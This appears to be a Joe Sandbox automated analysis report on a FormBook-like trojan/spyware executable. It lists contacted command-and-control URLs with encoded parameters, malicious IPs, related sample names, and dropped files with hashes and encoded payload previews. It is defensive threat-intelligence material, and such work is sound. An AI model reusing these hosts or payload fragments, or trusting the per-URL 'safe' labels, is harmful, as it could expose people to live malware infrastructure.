                                    www.ultraleap.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.linkwave.cloud
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.mgeducacaopro.online
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.63582.photo
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.asiapartnars.online
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.linkwave.cloud/al6z/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.asiapartnars.online/kt2f/?PR_xXrA=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&n0=mTk8u4lhzbnhVhtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.63582.photo/5o7d/?PR_xXrA=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&n0=mTk8u4lhzbnhVhtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.b5x7vk.agency/zznj/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.2bhp.com/a4ar/?n0=mTk8u4lhzbnhVh&PR_xXrA=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dalong.site/v2c3/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ultraleap.net/8pln/?PR_xXrA=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSTPR1nXcfMqNX8wInY=&n0=mTk8u4lhzbnhVhtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.linkwave.cloud/al6z/?n0=mTk8u4lhzbnhVh&PR_xXrA=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.asiapartnars.online/kt2f/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mfgarage.net/3lu7/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.63582.photo/5o7d/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dalong.site/v2c3/?n0=mTk8u4lhzbnhVh&PR_xXrA=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.b5x7vk.agency/zznj/?n0=mTk8u4lhzbnhVh&PR_xXrA=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ultraleap.net/8pln/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.heldhold.xyz/fava/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mgeducacaopro.online/xamn/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.heldhold.xyz/fava/?PR_xXrA=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&n0=mTk8u4lhzbnhVhtrue
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabmstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://duckduckgo.com/ac/?q=mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://whois.gandi.net/en/results?search=ultraleap.netmstsc.exe, 00000003.00000002.3548096253.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3549606840.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000002.3547618180.00000000033A6000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.gandi.net/en/domainmstsc.exe, 00000003.00000002.3548096253.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3549606840.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000002.3547618180.00000000033A6000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.ecosia.org/newtab/mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://ac.ecosia.org/autocomplete?q=mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.b5x7vk.agencyFrywuFHvnDbLo.exe, 00000005.00000002.3548998319.00000000052C5000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3FPR_xXrA%3Dnmstsc.exe, 00000003.00000002.3548096253.0000000005D46000.00000004.10000000.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000002.3547618180.0000000004036000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              67.223.117.189
                                              		www.heldhold.xyzUnited States
                                              		15189VIMRO-AS15189UStrue
                                              172.96.187.60
                                              		dalong.siteCanada
                                              		32475SINGLEHOP-LLCUStrue
                                              103.248.137.209
                                              		azkwupgf.as66588.comHong Kong
                                              		59371DNC-ASDimensionNetworkCommunicationLimitedHKtrue
                                              217.70.184.50
                                              		webredir.vip.gandi.netFrance
                                              		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
                                              81.88.63.46
                                              		www.2bhp.comItaly
                                              		39729REGISTER-ASITtrue
                                              104.21.11.31
                                              		www.b5x7vk.agencyUnited States
                                              		13335CLOUDFLARENETUStrue
                                              3.33.130.190
                                              		linkwave.cloudUnited States
                                              		8987AMAZONEXPANSIONGBtrue
                                              85.153.138.113
                                              		www.mfgarage.netTurkey
                                              		12946TELECABLESpainEStrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1518123
                                              Start date and time:2024-09-25 12:45:10 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 39s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Run name:Run with higher sleep bypass
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:rP0n___87004354.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@7/4@11/8
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 91%
                                              • Number of executed functions: 55
                                              • Number of non-executed functions: 279
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: rP0n___87004354.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              06:46:52API Interceptor8728961x Sleep call for process: mstsc.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              67.223.117.189Enquiry.exeGet hashmaliciousFormBookBrowse
                                              • www.uburn.xyz/iqqs/
                                              AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                              • www.uburn.xyz/unks/
                                              ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                              • www.uburn.xyz/unks/
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • www.heldhold.xyz/fava/
                                              LisectAVT_2403002B_466.exeGet hashmaliciousFormBookBrowse
                                              • www.techstone.top/d5fo/
                                              Shipping Documents 7896424100.exeGet hashmaliciousFormBookBrowse
                                              • www.nodedev.top/wnsq/
                                              ORDEN_240715189833.IMGGet hashmaliciousDarkTortilla, FormBookBrowse
                                              • www.akissdove.xyz/8ntn/
                                              OrderPI.exeGet hashmaliciousFormBookBrowse
                                              • www.helidove.xyz/no40/
                                              PRE-ALERT HTHC22031529.exeGet hashmaliciousFormBookBrowse
                                              • www.nodedev.top/wnsq/
                                              Scan405.exeGet hashmaliciousFormBookBrowse
                                              • www.bandbid.top/38gc/
                                              172.96.187.60DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • www.dalong.site/v2c3/
                                              xU0wdBC6XWRZ6UY.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.resmierabaru20.shop/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q==
                                              217.70.184.50CYTAT.exeGet hashmaliciousFormBookBrowse
                                              • www.languagemodel.pro/nxfn/
                                              Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                              • www.languagemodel.pro/nxfn/
                                              ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.offkase.org/vkr8/
                                              RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                              • www.ultraleap.net/hwgh/
                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                              • www.languagemodel.pro/nxfn/
                                              PO098765678.exeGet hashmaliciousFormBookBrowse
                                              • www.ultraleap.net/4qqr/
                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                              • www.languagemodel.pro/nxfn/
                                              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                              • www.akravchenko.dev/atph/
                                              Order#Qxz091124.exeGet hashmaliciousFormBookBrowse
                                              • www.akravchenko.dev/qeip/
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • www.ultraleap.net/8pln/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              www.heldhold.xyzDOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              webredir.vip.gandi.netCYTAT.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PO098765678.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              www.2bhp.comAWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                              • 81.88.63.46
                                              ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                              • 81.88.63.46
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 81.88.63.46
                                              azkwupgf.as66588.cominquiry and prices EO-230807.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              HBLAWBP.LISTCOC & INV.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.174
                                              NEW ORDERS scan_29012019.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              www.b5x7vk.agencyPayment Advise-PDF.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.165.25
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.11.31

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              SINGLEHOP-LLCUShttp://www.rb.gy/yfdl7y/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              http://www.rb.gy/h66x7g/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              http://www.rb.gy/6ucw3c/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              https://dev-612101459966.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              https://alliancecompositesinc.com/Get hashmaliciousUnknownBrowse
                                              • 96.127.182.206
                                              Warning_Report_[Limit_Notice].PDF HES0O.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 108.178.43.142
                                              Domain_Validation_Protocol_EX-205WQMN.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 108.178.43.142
                                              https://bdh.vcj.mybluehost.me/website_8e3e3126/wp-admin/ANTIA/infospage.php/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              https://www.cossuel.sn/css/Get hashmaliciousUnknownBrowse
                                              • 109.199.108.176
                                              http://scarce-army-wide.on-fleek.app/Get hashmaliciousHTMLPhisherBrowse
                                              • 108.178.38.98
                                              GANDI-ASDomainnameregistrar-httpwwwgandinetFRCYTAT.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PO098765678.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              Order#Qxz091124.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              DNC-ASDimensionNetworkCommunicationLimitedHKinquiry and prices EO-230807.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              HBLAWBP.LISTCOC & INV.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.174
                                              NEW ORDERS scan_29012019.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              Udspecialiser45.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 147.92.36.247
                                              http://oveman-austral.com/Get hashmaliciousUnknownBrowse
                                              • 147.92.44.231
                                              PURCHASING ORDER.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 147.92.35.81
                                              a82WdwCQnQOQf4b.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.35.81
                                              PTT Group project - Quotation.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.36.231
                                              RFQ - MK FMHS.RFQ.24.101.exeGet hashmaliciousFormBookBrowse
                                              • 207.148.37.252
                                              VIMRO-AS15189USEnquiry.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              SecuriteInfo.com.Win32.CrypterX-gen.29913.30159.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.118.13
                                              LisectAVT_2403002B_466.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              H37012.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 67.223.118.13
                                              file.exeGet hashmaliciousLummaC, Clipboard Hijacker, LummaC StealerBrowse
                                              • 67.223.119.7
                                              file.exeGet hashmaliciousLummaC, Clipboard Hijacker, LummaC StealerBrowse
                                              • 67.223.119.7
                                              Shipping Documents 7896424100.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              REGISTER-ASITrAGROTIS10599242024.exeGet hashmaliciousFormBookBrowse
                                              • 195.110.124.133
                                              BL Draft-Invoice-Packing list-Shipping Document.pif.exeGet hashmaliciousFormBookBrowse
                                              • 195.110.124.133
                                              oO3ZmCAeLQ.exeGet hashmaliciousFormBookBrowse
                                              • 195.110.124.133
                                              Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                              • 195.110.124.133
                                              AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                              • 81.88.63.46
                                              file.exeGet hashmaliciousFormBookBrowse
                                              • 195.110.124.133
                                              file.exeGet hashmaliciousFormBookBrowse
                                              • 195.110.124.133
                                              Quote 05-302.lnkGet hashmaliciousFormBookBrowse
                                              • 195.110.124.133
                                              ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                              • 81.88.63.46
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 81.88.63.46

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\2348427

                                              Download File
                                              Process:C:\Windows\SysWOW64\mstsc.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                              Category:dropped
                                              Size (bytes):114688
                                              Entropy (8bit):0.9746603542602881
                                              Encrypted:false
                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\autAE1.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\rP0n___87004354.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):50396
                                              Entropy (8bit):7.804819895302675
                                              Encrypted:false
                                              SSDEEP:1536:leeL3J851fdxDGpyPkJnseZD+fVZew9goGA:lp7J0FxqpySnLZD+fV8wz
                                              MD5:44811D0277D7A1B9311A9296C06CC07E
                                              SHA1:89A5DD1171F259CB9DCD223C2311876DCB3E3B63
                                              SHA-256:6095E6F8DCE72A56283A876495F9D3874C2CBB49EBCAE5BE16E26905A8AC6F46
                                              SHA-512:4E393F547CE586CB5656C2744B6E075D9D3F535C0B0318F03CD74E127633E0EE5A89365F58BCB679BF2A94B49A47379A995BB6EF69DAF57E6C20CE9C6E1738C8
                                              Malicious:false
                                              Reputation:low
                                              Preview:EA06.....L..y.:k'.R,T.-:.D.W&3K-..5..lu...eR.[....aI......oQ.S...Z.r.U@.....0..&.j..8..m.I.._8.M&.*..O6..f3.|.0..)....6..s....4..&3...b.Xm.{D..0..,s...Qy.^f...q<...i..q<.QlU...m#...)..a,.].....m?.K....:i]..'...:.(.....a'.Q&...p.....k..G9..*.K...c......c..-....a%.R.....m_.Rg6...kt.W...&qc...uY..aj.T..y..ac.Q..I.^sk.L.)..a:.P.6I..eu../3...v.XP...zqa..&..$.sD.^lV...e<..f...".0..H.I...8.Nm.Z..9..'v+...6..).....x.L.....U6.N&S.d.E5.Ni.i...9.M..9D...I&.I.....z.Q...Wd..i...ca.M..:..P. K.7...6......U5..ds.E..3....;d..6......4..mS.E..b.Ne3ie....\f.....PZf...~sV.Z,...:is.Y..5..`.Il.+.J.H...P..0..-...,.`..l...nk;.P..4..K.J,.5..g.Q'.Y..iY...@*D.....Sk,..9.N-.[..Q8...j...,.L....s,.[,t..x........U..*.....d..*....a?.Sl.{5F.;.\.4....:.\*.. ..Y.Q..y..q7..5..ir..l.5j.R.Q.1...q1.N,.`.B_0..* O.Fml.Jg.y..qi...k,..z.0%Vi..sf.X..0..iy.O.....!v.X....q)..)6I|..0...i...%.Ql...2.M.].t...au.T/.Z.Nmc.S....._5.Mh.*e..f.Y...E..k.P'....#..%...h...M..jd..9.N+sY..}4.Y..k..f..

                                              C:\Users\user\AppData\Local\Temp\benting

                                              Download File
                                              Process:C:\Users\user\Desktop\rP0n___87004354.exe
                                              File Type:ASCII text, with very long lines (57348), with no line terminators
                                              Category:dropped
                                              Size (bytes):57348
                                              Entropy (8bit):5.74838018161682
                                              Encrypted:false
                                              SSDEEP:1536:cbiNaZSk7xpmjwBpVqBs0nsiwJByZV0icwz7+1evKfxJJ:cGw0kdkjwzVqBs0svGV0DwX+1G+J
                                              MD5:07A96647D5F0058550E2B504FF4B0822
                                              SHA1:C5BDEA69672EDDB989CCCCE1A219E5E2524CC345
                                              SHA-256:5E2A389EDD0E515B05DD21FE60A0C56BF558276581485602EA2DDDE15FCC7D2D
                                              SHA-512:F304225BAFD7A334B1D71DAB0C0ED1122D604FFF77B62B88DFC259C926908524C9B72F0CBBA6A1363832BF78B306685D47705AAE4F4C659AD733FC610CA58D10
                                              Malicious:false
                                              Reputation:low
                                              Preview:03x'5N5'8HbLeNcD8\14efc5c%c_0D2R0n0L0:0I5s695!7QbO8n6Vbr0U0:0C0?0/056R6I8E9h4<5/8640bV9'6'510O0V090M0a0L6a6+8b9i4?d1836Mbban7h2b030c0_0O0y0y686F8<9r5v5D8<8EbP8G6#eZ0B0s0,0v0o076?6/8M9N4]5d8YaNb(9b6y5b0'0D010\0,0W6P6p8#9a4Td`8icqbmaQ6^co0l0y0G0%0K0?6x6_8I9k5-5t8_ePbI8c3{3U0.0j0S0W0>0c6F6d8W9k435"9K0:bC9d3B2u0W0y0r0;0.0C6L6^8a984|d59D2ybkav2<e]0)0>0N060,0d6b6y8t9o5]5Y9_4;b{8s6O4O0N0A0L0r0w0v6*64829L4"5n9L66bY9D6$c(0[060$040!0y6n6V8b9@4+dk9H8;b1a86ucV0(0y0/0l090]6{6(809*5'5#9ha\3}3hcl0u6A65899I4/5j9(cebb9)6,eo0C0q0J0D0N0d6i6`8_9V8hd[4N4sfff;frf`f%fRbRaH7'4U0M0\050h0M0K6b6t8t9Z9[5;4C68f4fKf(fJf}fgbD856<4Y040r0j000N036"6e8d928m5z4(8_fmf_f_f,f2fKb39,6lcN0f0K0y0p0{0K6U6V8T9w8qds4Va>frf?fMfwfQf;bsaJ6`c:0a0V0d0p0Y0G6W6w879&9\5!4rc]f)fZfRfGfrf`b98128e60.0/0I0Q030Q6l6)8w9r8i5K46e6fzfZf*f>f9f@b@9D6c4y0<010V010v0b6=6*8)928Id/5{0/f=f!f,f%fEfQbLaM6vcI0=0u0C0|0_0S6c6N8)9c9/5T5E2Lf~f6fofMfDfkb@8]6mc#0N0/0v0Z0c0D6^6L8c9<8[535>4hf&fxfgfUf*f>3=3ncw9~6D6I8k9Z80dK5-6@f]f.f8f<fPfGb!aa7`5}0`0-0m0:0T0e6<6(8W9~

                                              C:\Users\user\AppData\Local\Temp\retrofits

                                              Download File
                                              Process:C:\Users\user\Desktop\rP0n___87004354.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):287744
                                              Entropy (8bit):7.995578582570183
                                              Encrypted:true
                                              SSDEEP:6144:1b4+fO6sBgth4vHZmCCIOYr2iCX9giju7i6V1sHEvNjj0:eJ6h4v8aAWij2F5FU
                                              MD5:98B616737713434C6AF83B84116DF158
                                              SHA1:14E81A3B1381DB949531B4D5A0F2BEF7A58DB3DF
                                              SHA-256:0C1D7D8216968DCF34CE33C6342506EDF3B769361C9C22629198E3D2521E6D2E
                                              SHA-512:09E3C77B9DCB3CCDC909EC81C9D5137DE98CA2B57A2932CAF7E6E2F7C2004282E6370A587204FBF914CA98A9D75797059468FB6D578562FA420C9267935DBB3C
                                              Malicious:false
                                              Preview:{..e.9MF3...N.....OY...~I>...69MF3H2OGUMV83WOZI28VJ6RR769MF.H2OIJ.X8.^.{.3t.kb:;D.I?)T:S"g6,8V\#o8,.J#$.;<.rv.f^'V*iX@\.3WOZI28/K?.oWQ.p&T../ .W..m/=.(....25.,...(U..<.>.S0.ZI28VJ6R.r69.G2H..MV83WOZI.8TK=SY76kIF3H2OGUMVx WOZY28V:2RR7v9MV3H2MGUKV83WOZI48VJ6RR76IIF3J2OGUMV:3..ZI"8VZ6RR7&9MV3H2OGU]V83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV.G27.I28..2RR'69M.7H2_GUMV83WOZI28VJ.RRW69MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2O

                                              Static File Info

                                              General

